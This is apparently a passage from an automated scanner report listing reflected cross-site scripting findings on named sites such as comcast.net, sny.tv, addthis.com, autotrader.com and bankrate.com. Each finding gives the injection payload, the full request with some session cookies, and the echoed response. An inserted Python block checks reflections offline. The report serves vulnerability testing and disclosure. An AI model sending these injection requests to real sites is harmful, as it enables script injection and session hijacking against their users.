Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/1920876736/UNKNOWN/default/empty.gif/726e6e65456b7a75345934414371526a;zip=US:77002?x" target="_top">
...[SNIP]...

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e31"><script>alert(1)</script>df1925c3675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.net/?62e31"><script>alert(1)</script>df1925c3675=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 483
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a;zip=US:77002
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a?62e31"><script>alert(1)</script>df1925c3675=1" ALT="" BORDER="0">
...[SNIP]...

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://signup.comcast.net
Path:   /identity/reg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b994"><script>alert(1)</script>006d67d6e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1 HTTP/1.1
Host: signup.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.7
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: PlaxoLang=en; path=/; domain=.account.comcast.net
Set-Cookie: PlaxoCS=1624913714130882655; path=/; domain=.account.comcast.net
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="Content-Type" content="text/html; charset=utf-
...[SNIP]...
<form method="POST" action="https://signup.comcast.net/identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1" onsubmit="return validateSignup(this);" name="signupForm">
...[SNIP]...

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tvoneonline.com
Path:   /video/b_player.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dede"><script>alert(1)</script>a693329120d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1 HTTP/1.1
Host: tvoneonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>A Different World, Lincoln Heights, Love That Girl, Way Bl
...[SNIP]...
<form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1#comments_anchor" onsubmit="rememberfields()" style="display:none;">
...[SNIP]...

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /fan_zone/messageboard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fa0fc</script><script>alert(1)</script>644720c7edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fan_zone/messageboard/?fa0fc</script><script>alert(1)</script>644720c7edd=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct04-dc2
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 19 Dec 2010 18:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34231


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>Home | SNY.t
...[SNIP]...
section = "fan_zone";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/fan_zone/messageboard/']
   // requestQuery: fa0fc</script><script>alert(1)</script>644720c7edd=1        
   </script>
...[SNIP]...

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /media/video.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 40697</script><script>alert(1)</script>e05f1431920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/video.jsp?40697</script><script>alert(1)</script>e05f1431920=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: t01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7188
Expires: Sun, 19 Dec 2010 20:31:30 GMT
Date: Sun, 19 Dec 2010 18:31:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75019


                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
   var section = "video";
   var ctxPath = "";
   var pageid = "topic_video";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/media/video.jsp']
   // requestQuery: 40697</script><script>alert(1)</script>e05f1431920=1        
   </script>
...[SNIP]...

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/archive.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload ceb7c</script><script>alert(1)</script>8fba1b30fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/archive.jsp?ceb7c</script><script>alert(1)</script>8fba1b30fa7=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:26 GMT
Date: Sun, 19 Dec 2010 18:30:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42868


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY.tv: News<
...[SNIP]...
t">
   var section = "news";
   var ctxPath = "";
   var pageid = "archive";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/archive.jsp']
   // requestQuery: ceb7c</script><script>alert(1)</script>8fba1b30fa7=1        
   </script>
...[SNIP]...

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/columnist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 83b42</script><script>alert(1)</script>76f090a1843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/columnist.jsp?83b42</script><script>alert(1)</script>76f090a1843=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Content-Length: 30481
Connection: close


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY Columnis
...[SNIP]...
   var section = "news";
   var ctxPath = "";
   var pageid = "columnist";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/columnist.jsp']
   // requestQuery: 83b42</script><script>alert(1)</script>76f090a1843=1        
   </script>
...[SNIP]...

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /search/media.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload d5034</script><script>alert(1)</script>e5e8c9bf78b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/media.jsp?d5034</script><script>alert(1)</script>e5e8c9bf78b=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33552


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SN
...[SNIP]...
pt">
   var section = "media";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/search/media.jsp']
   // requestQuery: d5034</script><script>alert(1)</script>e5e8c9bf78b=1        
   </script>
...[SNIP]...

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3462"-alert(1)-"d0eff2b1478 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpa3462"-alert(1)-"d0eff2b1478 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cjihrpeovelp8v558shmush177; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpa3462"-alert(1)-"d0eff2b1478";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...
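
The scanner's method in every issue in this section is the same: send a payload wrapped in random alphanumeric markers, look for the markers in the response, and classify the syntactic context the echo landed in (a quoted JavaScript string, a text node, an attribute value). The Python below is an added example of that check, not the scanner's or any listed site's code. It runs offline against response fragments constructed from the echoed lines shown in 2.128, 2.129, 2.132 and 2.139; `check_reflection`, `classify_context` and the `Reflection` record are names of this example's own. It also covers the report's "echoed as ..." case, where the server URL-decodes the payload before writing it out.

```python
"""Offline reproduction of the reflection check this report relies on.

Added example, not the scanner's or any site's code. The response fragments
in SAMPLES are constructed from the echoed lines shown in issues 2.128,
2.129, 2.132 and 2.139, trimmed to well-formed snippets; nothing is sent.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote


@dataclass
class Reflection:
    found: bool
    unmodified: bool   # True when the payload appears exactly as sent
    context: str       # js-string-dq | js-string-sq | js-code | html-attr | html-tag | html-text | none
    snippet: str       # a little surrounding text, for the report


def _js_quote_state(js: str) -> Optional[str]:
    """Return the quote character of an unterminated string literal at the end of
    `js`, or None. Handles backslash escapes; comments, template and regex
    literals are not modelled (none of the sinks seen here need them)."""
    quote = None
    i = 0
    while i < len(js):
        c = js[i]
        if quote:
            if c == "\\":
                i += 2          # skip the escaped character
                continue
            if c == quote:
                quote = None
        elif c in ('"', "'"):
            quote = c
        i += 1
    return quote


def classify_context(body: str, pos: int) -> str:
    """Classify the syntactic context at body[pos] from the text before it."""
    before = body[:pos]
    opens = list(re.finditer(r"<script\b[^>]*>", before, re.I))
    closes = len(re.findall(r"</script\s*>", before, re.I))
    if len(opens) > closes:                      # inside a <script> block
        quote = _js_quote_state(before[opens[-1].end():])
        return {'"': "js-string-dq", "'": "js-string-sq"}.get(quote, "js-code")
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                                  # inside a tag
        in_attr = before[lt:].count('"') % 2 == 1    # double-quoted attributes only
        return "html-attr" if in_attr else "html-tag"
    return "html-text"


def check_reflection(body: str, payload: str) -> Reflection:
    """Look for the payload as sent, then as the server sees it after URL
    decoding (the report's 'echoed as ...' case)."""
    for candidate, unmodified in ((payload, True), (unquote(payload), False)):
        pos = body.find(candidate)
        if pos != -1:
            end = pos + len(candidate)
            return Reflection(True, unmodified, classify_context(body, pos),
                              body[max(0, pos - 24):end + 8])
    return Reflection(False, False, "none", "")


# Constructed (body, payload) pairs taken from the echoed lines in the report.
SAMPLES = {
    "2.128 addthis js string": (
        '<script type="text/javascript">\n'
        'var u = "/404/bookmark.phpa3462"-alert(1)-"d0eff2b1478";\n</script>',
        'a3462"-alert(1)-"d0eff2b1478',
    ),
    "2.129 addthis text node": (
        "<strong>bookmark.php866d9<script>alert(1)</script>f5c221fed4c</strong>",
        "866d9<script>alert(1)</script>f5c221fed4c",
    ),
    "2.132 bankrate attribute": (
        '<link rel="canonical" href="http://www.bankrate.com/compare-rates.aspx?'
        'e52be"style="x:expression(alert(1))"0d77ae31848=1" />',
        'e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848',
    ),
    "2.139 comcast js string": (
        "<script>\nvar ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',\n"
        "    edata,\n    'comcast.net/sports/boxingf67ef';fefd803c823/',\n    '@x17', randomNumber);\n"
        "</script>",
        "f67ef'%3bfefd803c823",
    ),
}


def scan_samples() -> dict:
    return {name: check_reflection(body, payload) for name, (body, payload) in SAMPLES.items()}


if __name__ == "__main__":
    for name, r in scan_samples().items():
        print(f"{name:26} found={r.found} unmodified={r.unmodified} context={r.context}")
```

The context classifier is deliberately simple (quote parity inside `<script>`, double-quoted attributes only); it is enough to reproduce the report's verdicts for these four sinks, and the "unmodified" flag distinguishes the Certain findings from the ones the report lists as "echoed as" a decoded form.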

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 866d9<script>alert(1)</script>f5c221fed4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php866d9<script>alert(1)</script>f5c221fed4c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n3ai0ab6isuvt5o8svci4rtgi2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php866d9<script>alert(1)</script>f5c221fed4c</strong>
...[SNIP]...

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e40a5"-alert(1)-"c1edf7a2e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/e40a5"-alert(1)-"c1edf7a2e70 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 91760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/e40a5"-alert(1)-"c1edf7a2e70";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19533"%3balert(1)//bdc50d644ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19533";alert(1)//bdc50d644ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?19533"%3balert(1)//bdc50d644ac=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:29 GMT
Server: Apache
Set-Cookie: v1st=B6DE3D485BDE3E45; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=174.121.222.18.1292783429221107; path=/; expires=Fri, 28-Nov-14 18:30:29 GMT; domain=.autotrader.com
Set-Cookie: JSESSIONID=658315DCED88B718A593EBD8446E3348; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Mon, 26-Dec-2011 18:30:29 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3895617034.61475.0000; path=/
Content-Length: 58070


<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
BIRFPageData = {
pg_inst:"797433936860309222",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"19533";alert(1)//bdc50d644ac":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /compare-rates.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e52be"style="x:expression(alert(1))"0d77ae31848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers; CSS expressions are not evaluated in IE8 standards mode or later, so the payload demonstrates the attribute breakout rather than a cross-browser exploit.

Request

GET /compare-rates.aspx?e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/compare-rates.aspx?e52be"style="x:expression(alert(1))"0d77ae31848=1" />
...[SNIP]...

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dac"style%3d"x%3aexpression(alert(1))"881260241e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7dac"style="x:expression(alert(1))"881260241e5 in the application's response.

